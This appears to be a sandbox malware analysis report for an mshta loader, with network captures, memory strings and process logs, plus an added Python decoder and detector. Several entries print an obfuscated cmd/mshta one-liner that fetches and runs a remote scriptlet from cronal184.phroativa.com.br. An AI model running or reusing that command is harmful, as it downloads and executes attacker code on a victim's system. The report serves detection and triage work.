Source: global traffic |
HTTP traffic detected: GET /?2/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: cronal184.phroativa.com.br
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Connection: Keep-Alive
Host: www.wikipedia.org |
Source: mshta.exe, 00000003.00000003.1233596963.00000290661AD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/ |
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/( |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/ |
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236239083.0000028863F8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/ |
Source: mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1233829051.00000290661DB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/?2/ |
Source: mshta.exe, 00000003.00000002.1236630762.0000029066412000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/?2/St |
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/?2/U |
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/?2/l |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFooter |
Source: mshta.exe, 00000003.00000002.1235891376.0000028863EE5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c |
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://intake-logging.wikimedia.org/v1/eventsx |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&c |
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8 |
Source: mshta.exe, 00000003.00000003.1232948851.0000028863F93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863F94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://meta.wikimedia.org/wiki/Privacy_policy |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://meta.wikimedia.org/wiki/Terms_of_use |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikip |
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu |
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2. |
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://wikis.world/ |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()" |
|
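Decoding the one-liner above (added triage example; this is not part of the sandbox report or of the sample): the two array elements are JavaScript string literals built from \xHH and legacy octal \NNN escapes, and GetObject(_$_NXUI[1])[_$_NXUI[0]]() resolves to GetObject("script:HTtps://cronal184.phroativa.com.br/?2/")["KIITHZL"](). The script: prefix is the COM scriptlet moniker handled by scrobj.dll, which fetches the URL and runs the returned scriptlet, consistent with the scrobj.dll load and the GET /?2/ to that host recorded elsewhere in this report. The Python below reconstructs that from the command line, correlates the decoded URL with the observed request, and turns the same observations into a verdict. The command line is copied from the entry above; the benign control command line and its .hta path are constructed for the example, and the verdict strings are this example's own.

```python
"""Deobfuscate the mshta one-liner from the process-creation entries and derive
detection indicators from it. Added triage example; not part of the sandbox
report or the sample. Inputs: the command line as quoted in the report, plus a
constructed benign mshta invocation used as a control."""
import re
from urllib.parse import urlsplit

# Command line exactly as quoted in the report's "Process created" entry.
MALICIOUS_CMDLINE = (
    r'MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c",'
    r'"\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c'
    r'\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];'
    r'try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"'
)
# Constructed control (hypothetical path): a local .hta launched the ordinary way.
BENIGN_CMDLINE = r'mshta.exe "C:\Program Files\ExampleVendor\setup.hta"'
# Request seen in the report's network section (host and request target only).
OBSERVED_REQUEST = {'host': 'cronal184.phroativa.com.br', 'target': '/?2/'}

# JavaScript string-literal escapes: \xHH, \uHHHH, legacy octal \NNN, and the
# single-character escapes (\n, \", \\ ...). Unknown escapes pass through.
_ESC = re.compile(r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|[0-7]{1,3}|.)', re.S)
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'b': '\b', 'f': '\f', 'v': '\v'}
_STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
# GetObject(<arr>[i])[<arr>[j]](): element i is the moniker passed to GetObject,
# element j is the method name invoked on the object it returns.
_GETOBJECT_CALL = re.compile(
    r'GetObject\(\s*([\w$]+)\[(\d+)\]\s*\)\s*\[\s*\1\[(\d+)\]\s*\]\s*\(\s*\)', re.I)


def decode_js_escapes(s):
    """Resolve JS escape sequences in the body of a string literal."""
    def sub(m):
        e = m.group(1)
        if e[0] in 'xu':
            return chr(int(e[1:], 16))
        if e[0] in '01234567':
            return chr(int(e, 8))
        return _SIMPLE.get(e, e)
    return _ESC.sub(sub, s)


def script_body(cmdline):
    """Return the script after an inline javascript:/vbscript: handler, or None."""
    m = re.search(r'(?i)\b(javascript|vbscript):', cmdline)
    if not m:
        return None
    return cmdline[m.end():].rstrip().rstrip('"')


def matches_observed(url, observed=OBSERVED_REQUEST):
    """True when the decoded loader URL is the request the sandbox recorded."""
    p = urlsplit(url)
    target = (p.path or '/') + ('?' + p.query if p.query else '')
    return p.hostname == observed['host'].lower() and target == observed['target']


def analyze_mshta(cmdline):
    """Decode the one-liner and return the indicators a detection rule keys on."""
    result = {'inline_script': False, 'escaped_literals': 0, 'strings': [],
              'getobject_moniker': None, 'method': None, 'remote_url': None,
              'verdict': 'benign'}
    body = script_body(cmdline)
    if body is None:
        return result
    result['inline_script'] = True
    raw = _STRING_LITERAL.findall(body)
    result['strings'] = [decode_js_escapes(r) for r in raw]
    result['escaped_literals'] = sum(1 for r in raw if '\\' in r)
    m = _GETOBJECT_CALL.search(body)
    if m:
        i, j = int(m.group(2)), int(m.group(3))
        if max(i, j) < len(result['strings']):
            result['getobject_moniker'] = result['strings'][i]
            result['method'] = result['strings'][j]
    moniker = result['getobject_moniker'] or ''
    # "script:<url>" is the COM scriptlet moniker: scrobj.dll fetches the URL
    # and runs the scriptlet, which is what the scrobj.dll load and the GET /?2/
    # in the report correspond to.
    if moniker.lower().startswith('script:'):
        result['remote_url'] = moniker[len('script:'):]
    if result['remote_url'] and re.match(r'(?i)https?://', result['remote_url']):
        result['verdict'] = 'malicious: mshta inline script loads remote scriptlet'
    elif result['inline_script'] and result['escaped_literals']:
        result['verdict'] = 'suspicious: mshta inline script with escaped literals'
    return result


if __name__ == '__main__':
    for name, cl in (('sample', MALICIOUS_CMDLINE), ('control', BENIGN_CMDLINE)):
        r = analyze_mshta(cl)
        print(name, r['verdict'])
        if r['remote_url']:
            print('  GetObject("%s")["%s"]()' % (r['getobject_moniker'], r['method']))
            print('  matches observed request:', matches_observed(r['remote_url']))
```

The decoder is deliberately generic (hex, unicode and octal escapes) rather than keyed to this sample's array name, so the same function handles the next variant that only changes the variable name, the casing of mshta/javascript, or the mix of escape forms; the GetObject pattern is the part worth alerting on regardless of how the strings are encoded.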
Source: C:\Windows\System32\mshta.exe |
Section loaded (in load order): wldp.dll, mshtml.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, wldp.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, jscript9.dll, scrobj.dll, wininet.dll, windows.storage.dll, profapi.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, msls31.dll, d2d1.dll, dwrite.dll, d3d10warp.dll, dxcore.dll |
Source: mshta.exe, 00000003.00000003.1232948851.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWi>pG |
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWP} |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()" |
|